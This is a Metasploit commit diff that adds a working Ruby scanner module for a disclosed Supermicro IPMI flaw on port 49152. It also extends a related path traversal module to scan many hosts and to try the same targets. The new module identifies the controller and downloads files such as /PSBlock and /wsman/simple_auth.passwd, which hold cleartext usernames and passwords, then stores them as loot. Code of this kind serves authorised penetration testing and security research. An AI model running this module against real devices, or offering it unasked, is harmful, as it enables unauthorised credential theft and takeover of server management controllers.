Land #3465, @hmoore-r7's module for SMC IPMI Port 49152 file exposure vulnerability

2014-06-20 17:22:28 -05:00 · 2014-06-20 17:22:28 -05:00 · 469fae7058
parent e6e0de2b38 252d917bbb
commit 469fae7058
2 changed files with 112 additions and 5 deletions
--- a/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb
+++ b/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb
@ -0,0 +1,104 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'uri'
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Supermicro Onboard IPMI Port 49152 Sensitive File Exposure',
+      'Description' => %q{
+        This module abuses a file exposure vulnerability accessible through the web interface
+        on port 49152 of Supermicro Onboard IPMI controllers.  The vulnerability allows an attacker
+        to obtain detailed device information and download data files containing the clear-text
+        usernames and passwords for the controller. In May of 2014, at least 30,000 unique IPs
+        were exposed to the internet with this vulnerability.
+      },
+      'Author'       =>
+        [
+          'Zach Wikholm <kestrel[at]trylinux.us>', # Discovery and analysis
+          'John Matherly <jmath[at]shodan.io>',    # Internet-wide scan
+          'Dan Farmer <zen[at]fish2.com>',         # Additional investigation
+          'hdm'                                    # Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'URL', 'http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/'],
+          [ 'URL', 'https://github.com/zenfish/ipmi/blob/master/dump_SM.py']
+        ],
+      'DisclosureDate' => 'Jun 19 2014'))
+
+    register_options(
+      [
+        Opt::RPORT(49152)
+      ], self.class)
+  end
+
+  def is_supermicro?
+    res = send_request_cgi(
+      {
+        "uri"       => "/IPMIdevicedesc.xml",
+        "method"    => "GET"
+      })
+
+    if res && res.code == 200 && res.body.to_s =~ /supermicro/i
+      path = store_loot(
+        'supermicro.ipmi.devicexml',
+        'text/xml',
+        rhost,
+        res.body.to_s,
+        'IPMIdevicedesc.xml'
+      )
+      print_good("#{peer} - Stored the device description XML in #{path}")
+      return true
+    else
+      return false
+    end
+  end
+
+
+  def run_host(ip)
+
+    unless is_supermicro?
+      vprint_error("#{peer} - This does not appear to be a Supermicro IPMI controller")
+      return
+    end
+
+    candidates = %W{ /PSBlock /PSStore /PMConfig.dat /wsman/simple_auth.passwd }
+
+    candidates.each do |uri|
+      res = send_request_cgi(
+        {
+          "uri"       => uri,
+          "method"    => "GET"
+        })
+
+      next unless res
+
+      unless res.code == 200 && res.body.length > 0
+        vprint_status("#{peer} - Request for #{uri} resulted in #{res.code}")
+        next
+      end
+
+      path = store_loot(
+        'supermicro.ipmi.passwords',
+        'application/octet-stream',
+        rhost,
+        res.body.to_s,
+        uri.split('/').last
+      )
+      print_good("#{peer} - Password data from #{uri} stored to #{path}")
+    end
+  end
+
+end
--- a/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb
+++ b/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb
@ -9,8 +9,10 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

+
  APP_NAME = "Supermicro web interface"

  def initialize(info = {})
@ -23,7 +25,8 @@ class Metasploit3 < Msf::Auxiliary
        a valid, but not necessarily administrator-level account, to access the contents of any file
        on the system. This includes the /nv/PSBlock file, which contains the cleartext credentials for
        all configured accounts. This module has been tested on a Supermicro Onboard IPMI (X9SCL/X9SCM)
-        with firmware version SMT_X9_214.
+        with firmware version SMT_X9_214. Other file names to try include /PSStore, /PMConfig.dat, and
+        /wsman/simple_auth.passwd
      },
      'Author'       =>
        [
@ -33,8 +36,8 @@ class Metasploit3 < Msf::Auxiliary
      'License'     => MSF_LICENSE,
      'References'  =>
        [
-          #[ 'CVE', '' ],
-          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities' ]
+          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities' ],
+          [ 'URL', 'https://github.com/zenfish/ipmi/blob/master/dump_SM.py']
        ],
      'DisclosureDate' => 'Nov 06 2013'))

@ -107,7 +110,7 @@ class Metasploit3 < Msf::Auxiliary
    end
  end

-  def run
+  def run_host(ip)
    print_status("#{peer} - Checking if it's a #{APP_NAME}....")
    if is_supermicro?
      print_good("#{peer} - Check successful")
@ -133,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary

    file_name = my_basename(datastore['FILEPATH'])
    path = store_loot(
-      'supermicro.ipmi.traversal',
+      'supermicro.ipmi.traversal.psblock',
      'application/octet-stream',
      rhost,
      contents,